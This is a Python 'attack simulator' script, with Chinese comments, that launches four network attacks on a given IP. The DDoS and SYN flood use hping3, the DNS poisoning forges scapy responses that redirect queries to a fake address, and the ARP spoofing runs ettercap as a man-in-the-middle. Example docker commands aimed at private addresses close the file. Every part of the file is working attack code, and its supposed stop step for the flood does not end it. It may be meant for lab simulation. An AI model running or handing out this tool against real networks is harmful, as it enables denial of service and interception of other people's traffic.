import sys
import os
import subprocess
import threading
import time
from scapy.all import IP, UDP, DNS, DNSRR, DNSQR, send, sniff

def execute_ddos(target_ip, duration):
    print(f"Executing DDoS attack on {target_ip} for {duration} seconds...")
    def run_attack():
        subprocess.run(["hping3", "-S", "--flood", "-V", target_ip])
    # 创建线程运行攻击
    attack_thread = threading.Thread(target=run_attack)
    attack_thread.start()
    # 等待指定时间后停止攻击
    time.sleep(duration)
    print("Stopping DDoS attack...")
    attack_thread.join(timeout=0)  # 停止线程

def execute_dns_poisoning(target_ip, fake_ip):
    print(f"Executing DNS poisoning attack on {target_ip}, redirecting to {fake_ip}...")
    # DNS 投毒的目标域名
    target_domain = "baidu.com"
    # 构造伪造的 DNS 响应包
    def dns_poison(pkt):
        if pkt.haslayer(DNS) and pkt[DNS].qr == 0:  # 检查是否为 DNS 查询
            print(f"Intercepted DNS query for {pkt[DNSQR].qname.decode()} from {pkt[IP].src}")
            # 构造伪造的 DNS 响应
            spoofed_pkt = (
                IP(dst=pkt[IP].src, src=pkt[IP].dst) /
                UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /
                DNS(
                    id=pkt[DNS].id,
                    qr=1,  # 响应标志
                    aa=1,  # 权威回答
                    qd=pkt[DNS].qd,  # 查询部分
                    an=DNSRR(rrname=pkt[DNSQR].qname, ttl=10, rdata=fake_ip)  # 伪造的回答部分
                )
            )
            send(spoofed_pkt, verbose=0)  # 发送伪造的 DNS 响应
            print(f"Sent spoofed DNS response: {pkt[DNSQR].qname.decode()} -> {fake_ip}")

    # 使用 scapy 的 sniff 函数拦截目标 IP 的 DNS 查询
    sniff(
        filter=f"udp port 53 and ip src {target_ip}",
        prn=dns_poison,
        store=0
    )

def execute_arp_spoofing(target_ip, gateway_ip):
    print(f"Executing ARP spoofing attack on {target_ip}, pretending to be {gateway_ip}...")
    subprocess.run(["ettercap", "-T", "-M", "arp:remote", "/{}/".format(target_ip), "/{}/".format(gateway_ip)])

def execute_syn_flood(target_ip, port):
    print(f"Executing TCP SYN Flood attack on {target_ip}:{port}...")
    subprocess.run(["hping3", "-S", "-p", str(port), "--flood", target_ip])

def main():
    if len(sys.argv) < 2:
        print("Usage: python attack_simulator.py <attack_type> [parameters...]")
        sys.exit(1)

    attack_type = sys.argv[1]

    if attack_type == "ddos":
        if len(sys.argv) != 4:
            print("Usage: python attack_simulator.py ddos <target_ip> <duration>")
            sys.exit(1)
        target_ip = sys.argv[2]
        duration = int(sys.argv[3])
        execute_ddos(target_ip, duration)

    elif attack_type == "dns_poisoning":
        if len(sys.argv) != 4:
            print("Usage: python attack_simulator.py dns_poisoning <target_ip> <fake_ip>")
            sys.exit(1)
        target_ip = sys.argv[2]
        fake_ip = sys.argv[3]
        execute_dns_poisoning(target_ip, fake_ip)

    elif attack_type == "arp_spoofing":
        if len(sys.argv) != 4:
            print("Usage: python attack_simulator.py arp_spoofing <target_ip> <gateway_ip>")
            sys.exit(1)
        target_ip = sys.argv[2]
        gateway_ip = sys.argv[3]
        execute_arp_spoofing(target_ip, gateway_ip)

    elif attack_type == "syn_flood":
        if len(sys.argv) != 4:
            print("Usage: python attack_simulator.py syn_flood <target_ip> <port>")
            sys.exit(1)
        target_ip = sys.argv[2]
        port = int(sys.argv[3])
        execute_syn_flood(target_ip, port)

    else:
        print(f"Unknown attack type: {attack_type}")
        sys.exit(1)

if __name__ == "__main__":
    main()
# # DDoS 攻击
# docker run --rm attacker-image:latest python attack_simulator.py ddos 192.168.1.100 60
#
# # DNS 投毒
# docker run --rm attacker-image:latest python attack_simulator.py dns_poisoning 192.168.1.100 1.2.3.4
#
# # ARP 欺骗
# docker run --rm attacker-image:latest python attack_simulator.py arp_spoofing 192.168.1.100 192.168.1.1
#
# # TCP SYN Flood
# docker run --rm attacker-image:latest python attack_simulator.py syn_flood 192.168.1.100 80

